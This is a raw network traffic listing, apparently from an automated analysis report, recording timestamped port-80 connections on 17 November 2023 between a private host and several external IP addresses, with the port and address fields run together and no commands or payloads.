                                                                                                                                                                                                Nov 17, 2023 19:26:21.700855017 CET5013080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:21.700982094 CET5013080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:21.897051096 CET805013091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:21.897129059 CET805013091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:21.897326946 CET5013080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:23.207061052 CET5013080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:24.222685099 CET5013180192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:24.413650990 CET805013191.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:24.413928032 CET5013180192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:24.414150000 CET5013180192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:24.603250027 CET805013191.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:24.603327036 CET805013191.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:24.603497028 CET5013180192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:25.925203085 CET5013180192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:26.940788031 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.138004065 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.138278008 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.139713049 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.334332943 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.334551096 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335320950 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335561037 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335568905 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335896015 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336538076 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336620092 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336694002 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336765051 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336848021 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337019920 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337151051 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.376147985 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.376364946 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529169083 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529330015 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529376030 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529438019 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529602051 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529676914 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529773951 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529872894 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529939890 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530113935 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530129910 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530241013 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530451059 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530618906 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530945063 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.530997038 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.531280994 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.531575918 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.531900883 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.531969070 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532105923 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532150030 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532187939 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532226086 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532263041 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.532300949 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.571161985 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.571217060 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.725703955 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.725785971 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.725905895 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.725961924 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726013899 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726064920 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726114988 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726166010 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726243019 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726255894 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:27.726331949 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.922230005 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:27.922537088 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:28.116532087 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:28.116710901 CET805013291.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:28.116884947 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:28.643358946 CET5013280192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:29.658843994 CET5013380192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:29.846005917 CET805013391.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:29.846265078 CET5013380192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:29.846501112 CET5013380192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032459974 CET805013391.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032545090 CET805013391.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032918930 CET5013380192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032919884 CET5013380192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:26:30.218671083 CET805013391.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:35.986599922 CET5013480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:36.153142929 CET805013438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:36.153498888 CET5013480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:36.153603077 CET5013480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:36.318871975 CET805013438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:36.323535919 CET805013438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:36.323556900 CET805013438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:36.323709965 CET5013480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:37.656984091 CET5013480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:38.672682047 CET5013580192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:38.839183092 CET805013538.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:38.839523077 CET5013580192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:38.839636087 CET5013580192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:39.005875111 CET805013538.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:39.007271051 CET805013538.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:39.007349014 CET805013538.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:39.007671118 CET5013580192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:40.343902111 CET5013580192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.359509945 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.524749994 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.525129080 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.526483059 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693526030 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693687916 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693767071 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693871975 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693945885 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693949938 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694024086 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694132090 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694304943 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694592953 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694675922 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694766998 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694833040 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694839001 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.695015907 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.695091963 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860397100 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860467911 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860563040 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860650063 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860825062 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860935926 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861140013 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861174107 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861308098 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861481905 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861613035 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861920118 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861965895 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861990929 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862010002 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862173080 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862248898 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862761021 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862816095 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.862988949 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.863032103 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.863070965 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.863111019 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:41.863183022 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.027534962 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.027648926 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.027697086 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.027743101 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.027813911 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.028661013 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.028758049 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.028808117 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.028851986 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.028978109 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.029025078 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.029393911 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.031090021 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.031184912 CET805013638.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:42.031393051 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:43.030864000 CET5013680192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.046348095 CET5013780192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.213028908 CET805013738.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:44.213283062 CET5013780192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.213428974 CET5013780192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.378679037 CET805013738.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:44.379849911 CET805013738.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:44.379928112 CET805013738.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:44.380301952 CET5013780192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.380301952 CET5013780192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:26:44.545376062 CET805013738.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.577933073 CET5013880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:49.747380018 CET8050138209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.747746944 CET5013880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:49.747857094 CET5013880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:49.916842937 CET8050138209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.917299032 CET8050138209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.917604923 CET8050138209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.917913914 CET5013880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:51.263381958 CET5013880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:52.279078007 CET5013980192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:52.452446938 CET8050139209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:52.452923059 CET5013980192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:52.453125954 CET5013980192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:52.623476982 CET8050139209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:52.624144077 CET8050139209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:52.624228954 CET8050139209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:52.624538898 CET5013980192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:53.965912104 CET5013980192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:54.981858015 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.151209116 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.151653051 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.154026031 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326468945 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326661110 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326706886 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326730967 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326747894 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327080011 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327173948 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327255011 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327397108 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327439070 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327476978 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327588081 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327953100 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.328129053 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497457981 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497530937 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497580051 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497658968 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497678995 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497710943 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497759104 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497792006 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497973919 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498017073 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498250008 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498341084 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498511076 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498750925 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498799086 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.499023914 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.499249935 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.499296904 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.669111967 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.669195890 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.669253111 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.669445038 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.669840097 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.670572042 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.670681000 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.671046019 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:55.981093884 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:56.153204918 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:56.153654099 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:56.293870926 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:56.322784901 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:56.322904110 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:56.322957039 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:56.323112011 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:56.463131905 CET8050140209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:56.668529034 CET5014080192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:57.684134007 CET5014180192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:57.855063915 CET8050141209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:57.855319977 CET5014180192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:57.855470896 CET5014180192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038084984 CET8050141209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038204908 CET8050141209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038306952 CET8050141209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038655996 CET5014180192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038655996 CET5014180192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:26:58.211671114 CET8050141209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:03.266769886 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:04.276135921 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:06.291347027 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:10.305988073 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:10.676022053 CET805014238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:10.676338911 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:10.676583052 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:11.064496994 CET805014238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:12.180738926 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:13.196329117 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:13.320956945 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:13.569246054 CET805014338.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:13.569417953 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:13.569660902 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:14.320822001 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:14.705108881 CET805014338.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:15.070702076 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:15.140255928 CET805014238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:15.140479088 CET5014280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:15.445945024 CET805014338.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:16.086316109 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:16.954644918 CET805014338.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:16.955254078 CET5014380192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:17.101442099 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:17.473153114 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:17.473478079 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:17.474773884 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:18.866688967 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:19.991761923 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:20.959978104 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.006851912 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.341607094 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:21.341933966 CET5014480192.168.11.2038.163.97.8
